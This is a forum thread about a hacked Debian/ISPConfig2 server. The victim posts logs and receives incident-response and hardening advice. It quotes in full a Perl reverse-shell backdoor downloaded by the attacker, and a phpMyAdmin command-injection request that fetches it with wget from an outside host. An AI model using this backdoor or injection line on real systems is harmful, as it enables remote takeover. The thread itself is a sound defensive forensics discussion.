Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 2 > General

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 7th October 2009, 00:30
calcetinconrombosman calcetinconrombosman is offline
Junior Member
 
Join Date: Oct 2009
Location: in a fucking capitalism world
Posts: 12
Thanks: 1
Thanked 0 Times in 0 Posts
Unhappy ispconfig2 debian perfect server hacked! please help!!

First of all, excuse my english, i'm a spanish native speaker. Today I tried to login to ispconfig2 control panel, and got this:
HTML Code:
Warning: include(../lib/config.inc.php) [function.include]: failed to open stream: No such file or directory in /home/admispconfig/ispconfig/web/login.php on line 30

Warning: include() [function.include]: Failed opening '../lib/config.inc.php' for inclusion (include_path='.:') in /home/admispconfig/ispconfig/web/login.php on line 30

Warning: require_once(login/lib/lang/.lng) [function.require-once]: failed to open stream: No such file or directory in /home/admispconfig/ispconfig/web/login.php on line 31

Fatal error: require_once() [function.require]: Failed opening required 'login/lib/lang/.lng' (include_path='.:') in /home/admispconfig/ispconfig/web/login.php on line 31
So i tried to get by ssh into the server, but it rejected the connection. So i run to my office as fast as i could, conected a screen and keyboard, and for my surprise, it presented me at the command line this:

Code:
THENAMEOFMYSERVER login:
It looked very strange to me, but i tried to login anyway and it did nothing. when i typed "root" at the "login" and pressed enter, the cursor just returned to next line without asking or doing anything else...so then i begin to understand. I rebooted the server and loged in by ssh (using putty), this time i could login, and search for changed files in the last 2 days. Found a new version of ssh under /usr/bin, and with 3:41 as time of change. Also, (../lib/config.inc.php) was deletted. I went through the logs and found this on /var/log/apache2/error.log:

Quote:
[Mon Oct 05 06:25:03 2009] [notice] Graceful restart requested, doing restart
[Mon Oct 05 06:25:04 2009] [notice] mod_python: Creating 8 session mutexes based on 150 max processes and 0 max threads.
[Mon Oct 05 06:25:04 2009] [notice] mod_python: using mutex_directory /tmp
[Mon Oct 05 06:25:04 2009] [notice] Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ruby/1.2.6 Ruby/1.8.$
[Mon Oct 05 06:25:04 2009] [warn] long lost child came home! (pid 12686)
[Tue Oct 06 03:06:24 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/phpMyAdmin
[Tue Oct 06 03:11:26 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/pma
[Tue Oct 06 03:13:52 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/mysql
[Tue Oct 06 03:16:23 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/pMA
[Tue Oct 06 03:18:50 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/scripts
[Tue Oct 06 03:21:19 2009] [error] [client 94.102.211.93] File does not exist: /var/www/sharedip/scripts
[Tue Oct 06 03:24:09 2009] [error] [client 94.102.211.93] File does not exist: /usr/share/phpmyadmin/config
--2009-10-06 03:35:40-- http://pistol.clan.su/dc.txt
Resolving pistol.clan.su... 217.199.217.6
Connecting to pistol.clan.su|217.199.217.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 726 [text/plain]
Saving to: `/var/tmp/dc.txt'

0K 100% 4.43K=0.2s

2009-10-06 03:35:41 (4.43 KB/s) - `/var/tmp/dc.txt' saved [726/726]

[Tue Oct 06 03:53:51 2009] [error] [client 204.244.11.123] script '/usr/share/phpmyadmin/config.inc.php' not found or unable to stat
[Tue Oct 06 03:53:52 2009] [error] [client 204.244.11.123] script '/usr/share/phpmyadmin/config.inc.php' not found or unable to stat
[Tue Oct 06 09:38:23 2009] [error] [client 194.109.21.230] File does not exist: /var/www/sharedip/proxycheck.txt
[Tue Oct 06 10:54:31 2009] [error] [client MYIPADDRESS] File does not exist: /var/www/sharedip/favicon.ico
[Tue Oct 06 10:54:34 2009] [error] [client MYIPADDRESS] File does not exist: /var/www/sharedip/favicon.ico
[Tue Oct 06 11:07:14 2009] [notice] caught SIGTERM, shutting down
[Tue Oct 06 11:09:05 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec)
[Tue Oct 06 11:09:07 2009] [notice] mod_python: Creating 8 session mutexes based on 150 max processes and 0 max threads.
[Tue Oct 06 11:09:07 2009] [notice] mod_python: using mutex_directory /tmp
[Tue Oct 06 11:09:07 2009] [notice] Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ruby/1.2.6 Ruby/1.8.$
[Tue Oct 06 11:15:13 2009] [notice] caught SIGTERM, shutting down
The file downloaded got this:

Code:
#!/usr/bin/perl
use Socket;
print "ZeuL's Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "[*] Datached\n\n";
var/log/auth.log got this:
Quote:
Oct 6 03:40:01 MYSERVERNAME CRON[2961]: pam_unix(cron:session): session closed for user www-data
Oct 6 03:41:01 MYSERVERNAME CRON[9643]: pam_unix(cron:session): session opened for user www-data by (uid=0)
Oct 6 03:41:01 MYSERVERNAME CRON[9643]: pam_unix(cron:session): session closed for user www-data
Oct 6 03:41:52 MYSERVERNAME chsh[10083]: changed user `bin' shell to `/bin/bash'
Oct 6 03:41:52 MYSERVERNAME sshd[10099]: error: Bind to port 22 on 0.0.0.0 failed: Address already in use.
Oct 6 03:41:52 MYSERVERNAME sshd[10099]: fatal: Cannot bind any address.
Oct 6 03:41:52 MYSERVERNAME sshd[1849]: Received signal 15; terminating.
Oct 6 03:42:01 MYSERVERNAME CRON[10104]: pam_unix(cron:session): session opened for user www-data by (uid=0)
Oct 6 03:42:01 MYSERVERNAME CRON[10104]: pam_unix(cron:session): session closed for user www-data
and /var/log/kern.log got:

Quote:
Oct 4 06:25:08 MYSERVERNAME kernel: imklog 3.18.6, log source = /proc/kmsg started.
Oct 5 06:25:04 MYSERVERNAME kernel: imklog 3.18.6, log source = /proc/kmsg started.
Oct 6 03:36:01 MYSERVERNAME kernel: [7128496.024928] PPP generic driver version 2.4.2
Oct 6 03:36:01 MYSERVERNAME kernel: [7128496.161469] NET: Registered protocol family 24
Oct 6 03:48:10 MYSERVERNAME kernel: [7129224.770098] syslogd[10394]: segfault at 8 ip 0804bc0b sp bfcc1dd4 error 7 in syslogd[8048000+6000]
Oct 6 03:51:47 MYSERVERNAME kernel: [7129441.780527] syslogd[10634]: segfault at 8 ip 0804bc0b sp bfb18c34 error 7 in syslogd[8048000+6000]
Oct 6 06:25:04 MYSERVERNAME kernel: Kernel logging (proc) stopped.
Oct 6 06:25:04 MYSERVERNAME kernel: imklog 3.18.6, log source = /proc/kmsg started.
Finally, when looking for chaged files, found a file under /usr/share named sshd.sync that got this:
Quote:
incoming : root:MYROOTPASSWORD
I'm pretty f**ked up, i need some directions please. The thing is that the mailserver is still going ok, and recently added 30 new users and half of them are working night and day on a urgent project for the next week, so i get the boot if i turn the server down.

PLEASE PLEASE HELP ME SECURE IT UNTIL THERE IS A CHANCE TO REPLACE IT.
Reply With Quote
Sponsored Links
  #2  
Old 7th October 2009, 03:09
calcetinconrombosman calcetinconrombosman is offline
Junior Member
 
Join Date: Oct 2009
Location: in a fucking capitalism world
Posts: 12
Thanks: 1
Thanked 0 Times in 0 Posts
Question can i migrate the passwords and accounts?

I've forgotten to ask if there is some chance to backup all the important files and configs to put them on another "perfect debian server w/ispconfig2" made from scratch?........thats what i meant by "replacing the server"
Reply With Quote
  #3  
Old 7th October 2009, 09:44
damir damir is offline
Senior Member
 
Join Date: Jun 2006
Posts: 375
Thanks: 11
Thanked 51 Times in 42 Posts
Default

Hi,

First, take a deep breath. If you have backup than it's ok. Don't panic. That's most important thing to remember. I have my share of crashed harddrives, servers and god know what else. It's not funny feeling but it's not the end of the world.

Was you server patched with the latest security patches? Have you used strong passwords and was your ssh secured?

First thing you should is to disconnect the machine from the network, than dump / to another harddrive. Because you never know what kind of backdoors, hack and scripts they left on the server. Only clean install will remove all that. You need to disconnect from network because you want to know how and through which security hole they came in. If you are in no hurry than you can while you are disconnected go through the server to find if this is done through bad web application like Joomla or something similar.

When you done with that, it depends of the customers but you should put a new machine up asap. Patch that machine, and install the latest ISPconfig. Than you should restore from backup but before you do that go through users sites to see if there was any web app that had security holes.

Some things to consider:

Secure php and apache
Install mod_security
set ServerSiganture off and ServerTokens ProductOnly in apache2.conf
SuEXEC and php through suPHP or fastcgi.
use good firewall
Install snort & ossec
use fail2ban
scan with rkhunter
use strong passwords
disable ROOT logins via SSH
enable publickey authentication and allow your IP's only to connect to machine.
disable services that you don't need.
Monitor your machine

Well there alot you can do but this is a good start, maybe someone else is gonna fill in.

Last edited by damir; 7th October 2009 at 09:46.
Reply With Quote
The Following User Says Thank You to damir For This Useful Post:
calcetinconrombosman (7th October 2009)
  #4  
Old 7th October 2009, 09:51
calcetinconrombosman calcetinconrombosman is offline
Junior Member
 
Join Date: Oct 2009
Location: in a fucking capitalism world
Posts: 12
Thanks: 1
Thanked 0 Times in 0 Posts
Unhappy NEED TO ADD NEW USERS..is there a command line way?

Thanks for the tips Damir, i'm shurely going to do a secure install when i get the chance to turn off the server, falling is a way to learn..a painful one. My site DON'T HOST ANYTHING, just mail for ONE SITE, and ONE WEBPAGE (for the same site) that says "under construction" in plain html, and if you look at the first log that i posted you can see that the hacker is trying to get a weak php from the "sharedip" page included in ispconfig, so i really think that the way they got in was from weak php codes, that i didn't add (because i'm not hosting anything). Also, the site don't have roundcube, just using the squirrelmail downloaded for ispconfig2. A link describing the attack is this:

Code:
http://milw0rm.com/papers/260
The correct user is admispconfig or admispco?? I got the last one as the owner of several folders and can't tell if it was modified or just can't read the whole user name when doing "ls -la".

my /etc/passwd file got this, can you tell me if there are normal users for a ispconfig2 install? (i've excluded mail users, nothing wrong in there)
Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/bash
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
webmaster:x:1000:1000:admin cefop,,,:/home/webmaster:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
fetchmail:x:104:65534::/var/lib/fetchmail:/bin/false
bind:x:105:106::/var/cache/bind:/bin/false
mysql:x:106:107:MySQL Server,,,:/var/lib/mysql:/bin/false
postfix:x:107:109::/var/spool/postfix:/bin/false
clamav:x:108:111::/var/lib/clamav:/bin/false
amavis:x:109:112:AMaViS system user,,,:/var/lib/amavis:/bin/sh
ntp:x:110:113::/home/ntp:/bin/false
proftpd:x:111:65534::/var/run/proftpd:/bin/false
ftp:x:112:65534::/home/ftp:/bin/false
admispconfig:x:1001:1001:Administrator ISPConfig:/home/admispconfig:/bin/bash
ispconfigend:x:20000:20000::/home/ispconfigend:/usr/sbin/nologin
web1_anonftp:x:12001:12001::/var/www/web1/ftp:/bin/false
filter:x:113:61:Postfix Filters:/var/spool/filter:/bin/sh
if i trace all files and folders modified those obscure hours, i get this:
Code:
cefopserver:/var/backups# find / -mmin -1500 ! -mmin -1320
/var
/var/lib/phpmyadmin
/var/cache/ldconfig
/var/cache/ldconfig/aux-cache
/var/backups/passwd.bak
/var/backups/shadow.bak
/var/empty
/etc/passwd
/etc/ld.so.cache
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/phpmyadmin
/etc/rpm
/usr/share
/usr/share/phpmyadmin
/usr/bin
/usr/bin/ssh
/usr/sbin
/usr/sbin/xntps
/usr/include
/usr/include/hosts.h
/lib
/lib/security
/lib/libproc.so
/sbin
/bin
/home/admispconfig/ispconfig/lib
find: /proc/21294/task/21294/fd/4: No such file or directory
find: /proc/21294/task/21294/fdinfo/4: No such file or directory
find: /proc/21294/fd/4: No such file or directory
find: /proc/21294/fdinfo/4: No such file or directory
/root/ispconfig/scripts/lib
if i list just the files, i get this:
Code:
cefopserver:/var/backups# find / -mmin -1500 ! -mmin -1320 -type f
/var/cache/ldconfig/aux-cache
/var/backups/passwd.bak
/var/backups/shadow.bak
/etc/passwd
/etc/ld.so.cache
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/usr/bin/ssh
/usr/sbin/xntps
/usr/include/hosts.h
find: /proc/21352/task/21352/fd/4: No such file or directory
find: /proc/21352/task/21352/fdinfo/4: No such file or directory
find: /proc/21352/fd/4: No such file or directory
find: /proc/21352/fdinfo/4: No such file or directory
I've deletted the downloaded perl file, and expecting some direction on how to safely remove the corrupted ssh and reinstall a good one. Also please tell me if there is a way to restore the php config files deleted that prevent ispconfig control panel from working, since i have been asked to modify some accounts passwords and add some new users. From the directories and files modified above you can tell which directories got deletion, and please point me where to find info on what should those folders have. Mail, squirrelmail and DNS are still working ok. really Hoping to hear from anyone, i'll be awake until this gets better....

Last edited by calcetinconrombosman; 7th October 2009 at 10:09.
Reply With Quote
  #5  
Old 7th October 2009, 10:12
damir damir is offline
Senior Member
 
Join Date: Jun 2006
Posts: 375
Thanks: 11
Thanked 51 Times in 42 Posts
Default

If you have no sites on the server, than there are only applications like ISPConfig, PhpMyAdmin and squirrelmail that are installed. You do have latest Debian Lenny all patched up with latest security patches?
Reply With Quote
  #6  
Old 7th October 2009, 10:36
calcetinconrombosman calcetinconrombosman is offline
Junior Member
 
Join Date: Oct 2009
Location: in a fucking capitalism world
Posts: 12
Thanks: 1
Thanked 0 Times in 0 Posts
Default

mmm no. I just installed the "perfect debian lenny server" about four months ago, added squirrelmail, tweak some here and there, added the accounts, and let it alone :-( . Didn't apply any security patch to it. If you point me on the right direction, i'll be doing it in no time...

looking again at the "/var/log/apache2/other_vhosts_access.log" i've found the exact command that got the "dc.txt" file into the server.

/var/log/apache2/other_vhosts_access.log
Code:
localhost:80 204.244.11.123 - - [06/Oct/2009:03:35:40 -0400] "GET //phpmyadmin///config.inc.php?c=cd%20/dev/shm;wget%20http://pistol.clan.su/dc.txt%2059.106.21.54%208080 HTTP/1.1" 200 114 "-" "Conf"
and the next 2 lines (about 20 minutes later) show that them tried something again but by that time the file config.inc.php was already deleted (not sure about that).

Code:
localhost:80 204.244.11.123 - - [06/Oct/2009:03:53:51 -0400] "GET //phpmyadmin///config.inc.php?c=hostname HTTP/1.1" 404 409 "-" "Conf"
localhost:80 204.244.11.123 - - [06/Oct/2009:03:53:52 -0400] "GET //phpmyadmin///config.inc.php?c=uname%20-a;id HTTP/1.1" 404 409 "-" "Conf"
by the way, the attacks came, coordinated, from munich, germany and from vancouver, canada. If you get to know them let me know...

Last edited by calcetinconrombosman; 7th October 2009 at 10:43.
Reply With Quote
  #7  
Old 7th October 2009, 10:45
damir damir is offline
Senior Member
 
Join Date: Jun 2006
Posts: 375
Thanks: 11
Thanked 51 Times in 42 Posts
Default

It looks like they came in through phpmyadmin, which is known for security holes.

Have you installed phpmyadmin through apt-get or did you do manual install? What version of phpmyadmin are you running?

This is important to know so we can isolate the way the they came in.

Update your server by issuing following command:

Important: Maybe the script have corrupted some system files that makes upgrading not so easy. It's important that you have backup of the server.

apt-get update
apt-get -s upgrade

(-s is for simulating upgrade process so you can see what packages are going to be installed)

If you are ok with it than issue following command:

apt-get upgrade

Last edited by damir; 7th October 2009 at 10:50.
Reply With Quote
  #8  
Old 7th October 2009, 16:45
calcetinconrombosman calcetinconrombosman is offline
Junior Member
 
Join Date: Oct 2009
Location: in a fucking capitalism world
Posts: 12
Thanks: 1
Thanked 0 Times in 0 Posts
Default if ssh is spawned, should i do an apt-get update?

I fall asleep, but i'm back
i don't have backups....i know its the worst thing to do...but shurely i'm not going to do it never again in this life or any other. Is there a way to safely backup now the databases of ispconfig and restore them on a fresh install? is there a way to add new users with maildirs by shell? i don't care now if its insecure because the mail accounts will be used just for coordination and not for any sensible data, i'm been asked to do it anyway, and then find the way to reinstall the perfect debian server on another machine and migrate the info to keep the mai accounts running.

Now i remember how phpmyadmin came into the "perfect debian server - lenny - ispconfig2"....tired at the second night of installing it, in another of the howtoforge howtos, i followed the initial instructions of the fourth page of the howto for the same debian distro but the ispconfig3 one, so i did install it and when i realized that i was following the wrong howto, simply open the right one and continued from where i got in it.

Thanks for all the help Damir.....
Reply With Quote
  #9  
Old 7th October 2009, 19:21
calcetinconrombosman calcetinconrombosman is offline
Junior Member
 
Join Date: Oct 2009
Location: in a fucking capitalism world
Posts: 12
Thanks: 1
Thanked 0 Times in 0 Posts
Default can i get the accounts working again if i reinstall from scratch?

is there a safe way to do it? some tutorial? i know i've been hacked, but i want to try to restore as much as i can to a new fresh install and secure it from the begining, obiously the files that report some change near the atack hours get out of the restore, starting with ssh.
Reply With Quote
  #10  
Old 7th October 2009, 20:28
damir damir is offline
Senior Member
 
Join Date: Jun 2006
Posts: 375
Thanks: 11
Thanked 51 Times in 42 Posts
 
Default

Here is a excellent guide how to move ispconfig install to a new server.

http://howtoforge.org/forums/showpos...88&postcount=2
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
php Apps email not going through palkat General 8 21st September 2011 05:35
The Perfect Server - Debian Lenny (Debian 5.0) [ISPConfig 3] w/ RUBY skismatik HOWTO-Related Questions 2 11th April 2009 20:15
What can be wrong martin_rudowicz Installation/Configuration 9 11th May 2008 19:42
Perfect Server Debian 4.0 and VPS boris HOWTO-Related Questions 13 19th April 2008 23:15
Perfect Debian 3.1 failed of the E-MAIL Server explorer1979 HOWTO-Related Questions 1 21st October 2005 17:43


All times are GMT +2. The time now is 02:32.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.